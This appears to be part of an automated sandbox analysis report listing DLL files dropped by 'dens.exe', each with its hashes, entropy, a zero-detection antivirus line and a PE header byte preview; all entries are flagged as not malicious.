                                                                                                                                                                                                                                            SHA1:3FDE48214FD606114D7DF72921CF66EF84BC04C5
                                                                                                                                                                                                                                            SHA-256:3B46FA8F966288EAD65465468C8E300B9179F5D7B39AA25D7231FF3702CA7887
                                                                                                                                                                                                                                            SHA-512:3BDE0B274F959D201F7820E3C01896C24E4909348C0BC748ADE68610A13A4D1E980C50DAB33466469CDD19EB90915B45593FAAB6C3609AE3F616951089DE1FDC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.Z.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d...Qb.f.........." ...(.f................................................... ............`.............................................P......d......................../..............T...........................P...@...............(............................text....e.......f.................. ..`.rdata...O.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):821248
                                                                                                                                                                                                                                            Entropy (8bit):6.053537214093426
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:wA0uu7wLKRemz/MfQuZ3ekAHhly782XTw05nmZfRJ:wfTdkAFtAmZfRJ
                                                                                                                                                                                                                                            MD5:9AD5BB6F92EE2CFD29DDE8DD4DA99EB7
                                                                                                                                                                                                                                            SHA1:30A8309938C501B336FD3947DE46C03F1BB19DC8
                                                                                                                                                                                                                                            SHA-256:788ACBFD0EDD6CA3EF3E97A9487EEAEA86515642C71CB11BBCF25721E6573EC8
                                                                                                                                                                                                                                            SHA-512:A166ABCB834D6C9D6B25807ADDDD25775D81E2951E1BC3E9849D8AE868DEDF2E1EE1B6B4B288DDFBD88A63A6FA624E2D6090AA71DED9B90C2D8CBF2D9524FDBF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]ws..............n......j......Rn......j......j......j.......k..........$....k..9....k.......k.......k......Rich....................PE..d...7..d.........." ...#.B...H......\F....................................................`......................................... s..`....s.......................................I..............................PH..@............`...............................text....@.......B.................. ..`.rdata.......`.......F..............@..@.data................b..............@....pdata...............j..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):85272
                                                                                                                                                                                                                                            Entropy (8bit):6.591841805043941
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Iyhz79151BVo1vXfzIFnaR4bO1As0n8qsjk+VIMCVl7SyVx7:/hzx15evXkuxAP8qMk+VIMCVlJ
                                                                                                                                                                                                                                            MD5:30F396F8411274F15AC85B14B7B3CD3D
                                                                                                                                                                                                                                            SHA1:D3921F39E193D89AA93C2677CBFB47BC1EDE949C
                                                                                                                                                                                                                                            SHA-256:CB15D6CC7268D3A0BD17D9D9CEC330A7C1768B1C911553045C73BC6920DE987F
                                                                                                                                                                                                                                            SHA-512:7D997EF18E2CBC5BCA20A4730129F69A6D19ABDDA0261B06AD28AD8A2BDDCDECB12E126DF9969539216F4F51467C0FE954E4776D842E7B373FE93A8246A5CA3F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d....b.f.........." ...(.....^...............................................`............`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text...#........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179712
                                                                                                                                                                                                                                            Entropy (8bit):6.180800197956408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:IULjhBCx8qImKrUltSfGzdMcbb9CF8OS7jkSTLkKWlgeml:IgCeqImzSfIMcNCvOkSTLLWWem
                                                                                                                                                                                                                                            MD5:FCB71CE882F99EC085D5875E1228BDC1
                                                                                                                                                                                                                                            SHA1:763D9AFA909C15FEA8E016D321F32856EC722094
                                                                                                                                                                                                                                            SHA-256:86F136553BA301C70E7BADA8416B77EB4A07F76CCB02F7D73C2999A38FA5FA5B
                                                                                                                                                                                                                                            SHA-512:4A0E98AB450453FD930EDC04F0F30976ABB9214B693DB4B6742D784247FB062C57FAFAFB51EB04B7B4230039AB3B07D2FFD3454D6E261811F34749F2E35F04D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......a..#%p.p%p.p%p.p,..p)p.p5.q'p.p5.zp!p.p5.q!p.p5.q-p.p5.q)p.pn..q!p.p6.q&p.p%p.p.p.pm..q!p.p,..p$p.pm..q$p.pm.xp$p.pm..q$p.pRich%p.p........................PE..d...W..f.........." ...).....B......`........................................0............`..........................................h..l....i..................T............ .......O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...p..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):125208
                                                                                                                                                                                                                                            Entropy (8bit):6.138659353006937
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:IXw32spTVYgFoj6N2xE9sb7V/f/E4ZBq5syCtYPU95IMLPhr:IgGEOgFoj68ksRf/ERsX
                                                                                                                                                                                                                                            MD5:5377AB365C86BBCDD998580A79BE28B4
                                                                                                                                                                                                                                            SHA1:B0A6342DF76C4DA5B1E28A036025E274BE322B35
                                                                                                                                                                                                                                            SHA-256:6C5F31BEF3FDBFF31BEAC0B1A477BE880DDA61346D859CF34CA93B9291594D93
                                                                                                                                                                                                                                            SHA-512:56F28D431093B9F08606D09B84A392DE7BA390E66B7DEF469B84A21BFC648B2DE3839B2EEE4FB846BBF8BB6BA505F9D720CCB6BB1A723E78E8E8B59AB940AC26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d...eb.f.........." ...(............`_..............................................-.....`.........................................p`.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..hl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257304
                                                                                                                                                                                                                                            Entropy (8bit):6.565831509727426
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:/CxJS14bteS9B+ApcG0Qos0KR29py9qWM53pLW1AZHVHMhhhKoDStGwL0zsWD:/aeS9B+HQosbY9FfHVHXfEsWD
                                                                                                                                                                                                                                            MD5:7AE94F5A66986CBC1A2B3C65A8D617F3
                                                                                                                                                                                                                                            SHA1:28ABEFB1DF38514B9FFE562F82F8C77129CA3F7D
                                                                                                                                                                                                                                            SHA-256:DA8BB3D54BBBA20D8FA6C2FD0A4389AEC80AB6BD490B0ABEF5BD65097CBC0DA4
                                                                                                                                                                                                                                            SHA-512:FBB599270066C43B5D3A4E965FB2203B085686479AF157CD0BB0D29ED73248B6F6371C5158799F6D58B1F1199B82C01ABE418E609EA98C71C37BB40F3226D8C5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d...[b.f.........." ...(.....<.......................................................4....`..........................................c..P....c...................&......./......T.......T...............................@............................................text...v........................... ..`.rdata..............................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66328
                                                                                                                                                                                                                                            Entropy (8bit):6.227186392528159
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:9PgLpgE4Z27jHZWZnEmoANIMOIi7SyAx2:9EtHZeEmoANIMOIit
                                                                                                                                                                                                                                            MD5:A25BC2B21B555293554D7F611EAA75EA
                                                                                                                                                                                                                                            SHA1:A0DFD4FCFAE5B94D4471357F60569B0C18B30C17
                                                                                                                                                                                                                                            SHA-256:43ACECDC00DD5F9A19B48FF251106C63C975C732B9A2A7B91714642F76BE074D
                                                                                                                                                                                                                                            SHA-512:B39767C2757C65500FC4F4289CB3825333D43CB659E3B95AF4347BD2A277A7F25D18359CEDBDDE9A020C7AB57B736548C739909867CE9DE1DBD3F638F4737DC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8QtZY?'ZY?'ZY?'S!.'^Y?'..>&XY?'..<&YY?'..;&RY?'..:&VY?'.!>&XY?'O.>&_Y?'ZY>'.Y?'O.2&[Y?'O.?&[Y?'O..'[Y?'O.=&[Y?'RichZY?'........PE..d....b.f.........." ...(.V.......... @....................................................`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):160024
                                                                                                                                                                                                                                            Entropy (8bit):6.85410280956396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:ssvkxujgo7e2uONOG+hi+CTznfF9mNoDXnmbuVIMZ10L:snu0o7JUCNYOD2Kg
                                                                                                                                                                                                                                            MD5:9E94FAC072A14CA9ED3F20292169E5B2
                                                                                                                                                                                                                                            SHA1:1EEAC19715EA32A65641D82A380B9FA624E3CF0D
                                                                                                                                                                                                                                            SHA-256:A46189C5BD0302029847FED934F481835CB8D06470EA3D6B97ADA7D325218A9F
                                                                                                                                                                                                                                            SHA-512:B7B3D0F737DD3B88794F75A8A6614C6FB6B1A64398C6330A52A2680CAF7E558038470F6F3FC024CE691F6F51A852C05F7F431AC2687F4525683FF09132A0DECB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d....b.f.........." ...(.f..........`8..............................................C.....`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35608
                                                                                                                                                                                                                                            Entropy (8bit):6.430939025440004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:I1Rp7eiajKCGnAxQ0zdu9IMWtg5YiSyvKDAMxkEp5u:gRteiaIAxQ0zI9IMWty7Syyjxto
                                                                                                                                                                                                                                            MD5:41EE16713672E1BFC4543E6AE7588D72
                                                                                                                                                                                                                                            SHA1:5FF680727935169E7BCB3991404C68FE6B2E4209
                                                                                                                                                                                                                                            SHA-256:2FEB0BF9658634FE8405F17C4573FEB1C300E9345D7965738BEDEB871A939E6B
                                                                                                                                                                                                                                            SHA-512:CB407996A42BDF8BC47CE3F4C4485E27A4C862BF543410060E9F65D63BFBA4C5A854A1F0601E9D8933C549E5459CB74CA27F3126C8CDBDE0BDD2E803390AB942
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.A)../z../z../z..z../z.$.{../z.$,{../z.$+{../z.$*{../z.#.{../z...zr./z[..{../z.#"{../z.#/{../z.#.z../z.#-{../zRich../z........PE..d...\b.f.........." ...(. ...>......@...............................................#Q....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56088
                                                                                                                                                                                                                                            Entropy (8bit):6.330844955790863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:5inr44gaZPXPCJ/+yZdDDrRIMXtH7SyNx7:5ZJ/+yZdDDrRIMXtHt
                                                                                                                                                                                                                                            MD5:737F46E8DAC553427A823C5F0556961C
                                                                                                                                                                                                                                            SHA1:30796737CAEC891A5707B71CF0AD1072469DD9DE
                                                                                                                                                                                                                                            SHA-256:2187281A097025C03991CD8EB2C9CA416278B898BD640A8732421B91ADA607E8
                                                                                                                                                                                                                                            SHA-512:F0F4B9045D5328335DC5D779F7EF5CE322EAA8126EC14A84BE73EDD47EFB165F59903BFF95EB0661EBA291B4BB71474DD0B0686EDC132F2FBA305C47BB3D019F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.{X..(X..(X..(QxT(\..(...)Z..(...)[..(...)P..(...)T..(M..)Z..(X..(/..(.x.)]..(.x.)Y..(M..)Y..(M..)Y..(M.8(Y..(M..)Y..(RichX..(........PE..d...]b.f.........." ...(.N...`............................................................`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32536
                                                                                                                                                                                                                                            Entropy (8bit):6.553382348933807
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:WlzRmezj6rGqMoW45IMQUHR5YiSyvMcAMxkEm2j:yRm0mGpoW45IMQUHf7SyVxb
                                                                                                                                                                                                                                            MD5:E1C6FF3C48D1CA755FB8A2BA700243B2
                                                                                                                                                                                                                                            SHA1:2F2D4C0F429B8A7144D65B179BEAB2D760396BFB
                                                                                                                                                                                                                                            SHA-256:0A6ACFD24DFBAA777460C6D003F71AF473D5415607807973A382512F77D075FA
                                                                                                                                                                                                                                            SHA-512:55BFD1A848F2A70A7A55626FB84086689F867A79F09726C825522D8530F4E83708EB7CAA7F7869155D3AE48F3B6AA583B556F3971A2F3412626AE76680E83CA1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d...`b.f.........." ...(.....8............................................................`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83736
                                                                                                                                                                                                                                            Entropy (8bit):6.3186936632343205
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:mOYhekrkJqlerLSyypHf9/s+S+pzMii/n1IsJqKN5IMLwoR7SygCxkWN:vwkJqHyypHf9/sT+pzMiE1IwdN5IMLw0
                                                                                                                                                                                                                                            MD5:69801D1A0809C52DB984602CA2653541
                                                                                                                                                                                                                                            SHA1:0F6E77086F049A7C12880829DE051DCBE3D66764
                                                                                                                                                                                                                                            SHA-256:67ACA001D36F2FCE6D88DBF46863F60C0B291395B6777C22B642198F98184BA3
                                                                                                                                                                                                                                            SHA-512:5FCE77DD567C046FEB5A13BAF55FDD8112798818D852DFECC752DAC87680CE0B89EDFBFBDAB32404CF471B70453A33F33488D3104CD82F4E0B94290E83EAE7BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d....b.f.........." ...(.x..........0-.......................................`............`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):125208
                                                                                                                                                                                                                                            Entropy (8bit):6.262455715174875
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:6WdTrLGXVx7Qt+HEGFCO4w5yirrPrrrrrrbEOyfgv/pWwb8NIMOQI3:zAVxMt7pC5TrWgHos8e
                                                                                                                                                                                                                                            MD5:64417C2CCD84392880B417E8A9F7A4BC
                                                                                                                                                                                                                                            SHA1:88C6139471737B14D4161C010B10AD9615766DBB
                                                                                                                                                                                                                                            SHA-256:FDEACC2AFF71FE21D7A0DE0603388299FA203C2692FDBDB3709F1BC4CC9CDC0E
                                                                                                                                                                                                                                            SHA-512:05163D678F18EA901C5DA45F41EE25073B7834E711C2809F98DF122E6485B3979C5331709A6F48079A53931D3DBC3B569738B51736260CE1B67811C073C7EA84
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M..#..#..#.....#..1"..#..1..#..1 ..#..1'...#..1&..#..6"..#..."..#.."..#..6....#..6#..#..6..#..6!..#.Rich.#.........................PE..d....b.f.........." ...(.................................................................`.........................................@o..P....o..................D......../.......... ...T...............................@............................................text...X........................... ..`.rdata..b...........................@..@.data................~..............@....pdata..D...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178456
                                                                                                                                                                                                                                            Entropy (8bit):5.975111032322451
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:9EkiCZfBmvD1ZLnM2YfW6XSvWJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JVIMC7g:riC5QD1dwW6XSOMfjTwJH
                                                                                                                                                                                                                                            MD5:90F080C53A2B7E23A5EFD5FD3806F352
                                                                                                                                                                                                                                            SHA1:E3B339533BC906688B4D885BDC29626FBB9DF2FE
                                                                                                                                                                                                                                            SHA-256:FA5E6FE9545F83704F78316E27446A0026FBEBB9C0C3C63FAED73A12D89784D4
                                                                                                                                                                                                                                            SHA-512:4B9B8899052C1E34675985088D39FE7C95BFD1BBCE6FD5CBAC8B1E61EDA2FBB253EEF21F8A5362EA624E8B1696F1E46C366835025AABCB7AA66C1E6709AAB58A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..j8.98.98.91.09>.9._.8:.9._.8;.9._.80.9._.85.9-X.8>.98.9..9s..8?.9-X.8:.9-X.89.9-X\99.9-X.89.9Rich8.9........................PE..d....b.f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):25880
                                                                                                                                                                                                                                            Entropy (8bit):6.592919849955951
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:maxIcRiAWVIMZwbTHQIYiSy1pCQm9Y+pAM+o/8E9VF0Ny7yYV:ScR3WVIMZwn5YiSyvXMAMxkE8YV
                                                                                                                                                                                                                                            MD5:D8C6D60EA44694015BA6123FF75BD38D
                                                                                                                                                                                                                                            SHA1:813DEB632F3F3747FE39C5B8EF67BADA91184F62
                                                                                                                                                                                                                                            SHA-256:8AE23BFA84CE64C3240C61BEDB06172BFD76BE2AD30788D4499CB24047FCE09F
                                                                                                                                                                                                                                            SHA-512:D3D408C79E291ED56CA3135B5043E555E53B70DFF45964C8C8D7FFA92B27C6CDEA1E717087B79159181F1258F9613FE6D05E3867D9C944F43A980B5BF27A75AB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........p.n.#.n.#.n.#..Y#.n.#...".n.#...".n.#...".n.#...".n.#...".n.#...".n.#.n.#.n.#...".n.#...".n.#..5#.n.#...".n.#Rich.n.#................PE..d...db.f.........." ...(.....&......................................................ru....`.........................................p9..L....9..x....`.......P.......6.../...p..@...`3..T........................... 2..@............0..8............................text...h........................... ..`.rdata.......0......................@..@.data...`....@.......&..............@....pdata.......P.......(..............@..@.rsrc........`.......*..............@..@.reloc..@....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):37656
                                                                                                                                                                                                                                            Entropy (8bit):6.340152202881265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:rUmqQhTcYr6NxO0VIMCit5YiSyv4YmAJAMxkEn:Im7GBNxO0VIMCiz7SyQYmQxz
                                                                                                                                                                                                                                            MD5:827615EEE937880862E2F26548B91E83
                                                                                                                                                                                                                                            SHA1:186346B816A9DE1BA69E51042FAF36F47D768B6C
                                                                                                                                                                                                                                            SHA-256:73B7EE3156EF63D6EB7DF9900EF3D200A276DF61A70D08BD96F5906C39A3AC32
                                                                                                                                                                                                                                            SHA-512:45114CAF2B4A7678E6B1E64D84B118FB3437232B4C0ADD345DDB6FBDA87CEBD7B5ADAD11899BDCD95DDFE83FDC3944A93674CA3D1B5F643A2963FBE709E44FB8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.L...L...L...E..J.......H.......H.......D...Y...N.......Q.......K...L...........M...Y...M...Y...M...Y...M...Y...M...RichL...........PE..d...db.f.........." ...(.*...<.......(...................................................`..........................................V..H...HV..................x....d.../......t...dG..T............................C..@............@.......S..@....................text...n(.......*.................. ..`.rdata..4 ...@..."..................@..@.data........p.......P..............@....pdata..x............T..............@..@.rsrc................X..............@..@.reloc..t............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):55808
                                                                                                                                                                                                                                            Entropy (8bit):5.783964462250878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:/E+b3eOn7SZcnlhHHNpfR7Qbem8aaZxyCQEwNYUxq71Fp0866it:/3b3eOdHHbf5Q6mCQFNYTQ866it
                                                                                                                                                                                                                                            MD5:7229278B22B09E6A529DDB47005277B5
                                                                                                                                                                                                                                            SHA1:A19B7F423E758507EB1DE8168099A63A4460E328
                                                                                                                                                                                                                                            SHA-256:EE325848CF143DF67C63153BBAFD9E72E33F0B57E025079875A2A7B0CB919792
                                                                                                                                                                                                                                            SHA-512:BEEE7B5652A143383E91ADB3583D7EC8C43152C482A513F760EAAB949CE6AC78D8FFA3848A50DC53438BFAEFA6172B008FCA0B9997CFB31F4395D01F523D35FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.Z.V...V...V....4..V..%...V.......V..%...V..%...V..%...V......V...V..OV......V......V....X..V......V..Rich.V..........PE..d......f.........." ...(.....V...............................................0............`.........................................0...`.......d............................ .........................................@............................................text...8........................... ..`.rdata..,7.......8..................@..@.data...h...........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
